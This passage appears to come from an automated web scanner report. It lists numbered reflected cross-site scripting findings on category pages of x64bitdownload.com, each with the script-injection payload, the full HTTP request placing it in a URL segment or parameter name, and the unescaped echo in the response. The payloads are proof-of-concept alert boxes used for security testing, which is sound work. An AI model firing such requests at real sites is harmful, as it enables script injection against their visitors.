HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:30:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesa4190"><script>alert(1)</script>b2c86d6f802/free-64-bit-communications-downloads-3-0-d.html" />
...[SNIP]...

4.1642. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98438"><script>alert(1)</script>296e60cbefa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-downloads-3-0-d.html98438"><script>alert(1)</script>296e60cbefa HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-downloads-3-0-d.html98438"><script>alert(1)</script>296e60cbefa" />
...[SNIP]...

4.1643. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72117"><script>alert(1)</script>b715466a845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-downloads-3-0-d.html?72117"><script>alert(1)</script>b715466a845=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-downloads-3-0-d.html?72117"><script>alert(1)</script>b715466a845=1" />
...[SNIP]...

4.1644. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad71c"><script>alert(1)</script>a9e556abaea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesad71c"><script>alert(1)</script>a9e556abaea/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:30:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesad71c"><script>alert(1)</script>a9e556abaea/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html" />
...[SNIP]...

4.1645. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae6b"><script>alert(1)</script>f87477f9823 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.htmleae6b"><script>alert(1)</script>f87477f9823 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.htmleae6b"><script>alert(1)</script>f87477f9823" />
...[SNIP]...

4.1646. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f940"><script>alert(1)</script>3ed6d3e13d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html?3f940"><script>alert(1)</script>3ed6d3e13d4=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html?3f940"><script>alert(1)</script>3ed6d3e13d4=1" />
...[SNIP]...

4.1647. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c422"><script>alert(1)</script>5ca42390231 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories8c422"><script>alert(1)</script>5ca42390231/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:31:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories8c422"><script>alert(1)</script>5ca42390231/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html" />
...[SNIP]...

4.1648. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e997"><script>alert(1)</script>a563157449d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html7e997"><script>alert(1)</script>a563157449d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html7e997"><script>alert(1)</script>a563157449d" />
...[SNIP]...

4.1649. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e6f5"><script>alert(1)</script>37142a6112a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html?3e6f5"><script>alert(1)</script>37142a6112a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html?3e6f5"><script>alert(1)</script>37142a6112a=1" />
...[SNIP]...

4.1650. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880ff"><script>alert(1)</script>aaabc5d7835 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories880ff"><script>alert(1)</script>aaabc5d7835/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories880ff"><script>alert(1)</script>aaabc5d7835/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html" />
...[SNIP]...

4.1651. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25089"><script>alert(1)</script>5548c734076 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html25089"><script>alert(1)</script>5548c734076 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:52 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html25089"><script>alert(1)</script>5548c734076" />
...[SNIP]...

4.1652. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e41d5"><script>alert(1)</script>6359a8cd029 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html?e41d5"><script>alert(1)</script>6359a8cd029=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html?e41d5"><script>alert(1)</script>6359a8cd029=1" />
...[SNIP]...

4.1653. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6549"><script>alert(1)</script>b1e5c16342 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesd6549"><script>alert(1)</script>b1e5c16342/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:30:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesd6549"><script>alert(1)</script>b1e5c16342/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html" />
...[SNIP]...

4.1654. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fe78"><script>alert(1)</script>a8e92c56ad6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html2fe78"><script>alert(1)</script>a8e92c56ad6 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:03 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html2fe78"><script>alert(1)</script>a8e92c56ad6" />
...[SNIP]...

4.1655. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69b7b"><script>alert(1)</script>a8d922c9ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html?69b7b"><script>alert(1)</script>a8d922c9ee=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:07 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html?69b7b"><script>alert(1)</script>a8d922c9ee=1" />
...[SNIP]...

4.1656. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed3a"><script>alert(1)</script>e871d75a71b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesfed3a"><script>alert(1)</script>e871d75a71b/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesfed3a"><script>alert(1)</script>e871d75a71b/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html" />
...[SNIP]...

4.1657. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

